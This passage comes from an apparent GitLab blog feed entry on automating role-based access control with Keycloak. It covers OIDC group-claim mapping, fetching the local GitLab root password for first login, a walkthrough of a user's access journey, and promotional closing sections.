<li>Pre-configured GitLab client</li>
<li>Default client secret</li>
</ul>
<p>You can access the Keycloak admin console at <code>https://localhost:8443</code> with:</p>
<ul>
<li>Username: admin</li>
<li>Password: from your <code>.env</code> file</li>
</ul>
<p>To verify the setup:</p>
<ul>
<li>Log into the Keycloak admin console</li>
<li>Select the <strong>GitLab</strong> realm</li>
<li>Check <strong>Clients &gt; gitlab</strong></li>
</ul>
<p>Verify the client configuration matches your environment.</p>
<p>To showcase the automated RBAC mechanism, you will need to follow these steps:</p>
<ul>
<li>Map realm roles to GitLab roles</li>
<li>Create a group structure with mapped roles, matching the Group &gt; Sub-group &gt; Project pattern in GitLab</li>
</ul>
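<p>On the Keycloak side, role and group information reaches GitLab as OIDC claims. For example, a group-membership protocol mapper on the <code>gitlab</code> client can expose the user's groups as a <code>groups</code> claim. The following is a sketch of how such a mapper appears in an exported realm JSON (names are illustrative; adjust to your realm):</p>
<pre><code class="language-json">{
  &quot;name&quot;: &quot;groups&quot;,
  &quot;protocol&quot;: &quot;openid-connect&quot;,
  &quot;protocolMapper&quot;: &quot;oidc-group-membership-mapper&quot;,
  &quot;config&quot;: {
    &quot;claim.name&quot;: &quot;groups&quot;,
    &quot;full.path&quot;: &quot;true&quot;,
    &quot;id.token.claim&quot;: &quot;true&quot;,
    &quot;access.token.claim&quot;: &quot;true&quot;,
    &quot;userinfo.token.claim&quot;: &quot;true&quot;
  }
}
</code></pre>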
<p>Before provisioning your first users to the user groups, it’s recommended to log into your GitLab instance to retrieve your instance root password:</p>
<ol>
<li>
<p>Access GitLab at <code>http://localhost:8081</code>.</p>
</li>
<li>
<p>Get the root password:</p>
</li>
</ol>
<pre><code>docker exec gitlab grep 'Password:' /etc/gitlab/initial_root_password
</code></pre>
<ol start="3">
<li>Log in as root with the retrieved password.</li>
</ol>
<h2>Putting it all together</h2>
<p>To demonstrate the power of this integrated RBAC model, start by walking through a real-world user journey — from identity to access.</p>
<p>Begin in Keycloak by showcasing a user assigned to specific realm roles (e.g., developer, maintainer) and groups (e.g., /engineering/platform). These roles have been mapped to GitLab access levels via OIDC claims, while group affiliations align with GitLab’s structured hierarchy of root groups, sub-groups, and projects.</p>
<p>Upon login through GitLab’s SSO Keycloak endpoint, the user is automatically provisioned into the correct group and assigned the appropriate role — with no manual intervention.</p>
<p>Within GitLab, you can see that the user can interact with the assigned project. For example, a developer might push code and open a merge request, but not merge to protected branches — validating the least-privilege model.</p>
<p>Finally, you can showcase access across multiple teams or products that are managed centrally in Keycloak, yet enforced precisely in GitLab through group sync and permissions inheritance. This demo illustrates not just role assignment, but how GitLab and Keycloak together deliver real-time, automated access governance at scale — ready for secure, compliant, enterprise-grade software development.</p>
<h2>Why GitLab?</h2>
<p>GitLab’s comprehensive, intelligent DevSecOps platform is the ideal foundation for secure, scalable access management. With native OIDC support, granular role enforcement, SCIM-based user provisioning, and built-in audit logging, GitLab allows organizations to centralize control without compromising agility. Its flexible group hierarchy mirrors enterprise structure, making it easy to manage access across teams.</p>
<p>Integrating with identity providers like Keycloak automates onboarding, ensures least-privilege access, and creates a seamless identity-to-permission pipeline that supports regulatory and security goals. As a core component of GitLab’s security capabilities, RBAC ties directly into CI/CD, policy enforcement, and vulnerability management workflows.</p>
<h2>Summary</h2>
<p>RBAC is just the beginning. With GitLab and Keycloak, you’re not just securing access — you’re enabling structured, automated governance that scales. As you expand into policy enforcement, Secure SDLC, and DevSecOps automation, this foundation becomes a launchpad for sustainable, enterprise-grade software delivery.</p>
<blockquote>
<p>Get started with RBAC in GitLab today with a free, 60-day trial of GitLab Ultimate. <a href="https://about.gitlab.com/free-trial/">Sign up today</a>!</p>
</blockquote>
]]></content>
        <author>
            <name>James Wormwell</name>
            <uri>https://about.gitlab.com/blog/authors/james-wormwell</uri>
        </author>
        <author>
            <name>Paul Meresanu</name>
            <uri>https://about.gitlab.com/blog/authors/paul-meresanu</uri>
        </author>
        <author>
            <name>Kees Valkhof</name>
            <uri>https://about.gitlab.com/blog/authors/kees-valkhof</uri>
        </author>
        <published>2025-06-20T00:00:00.000Z</published>
    </entry>
</feed>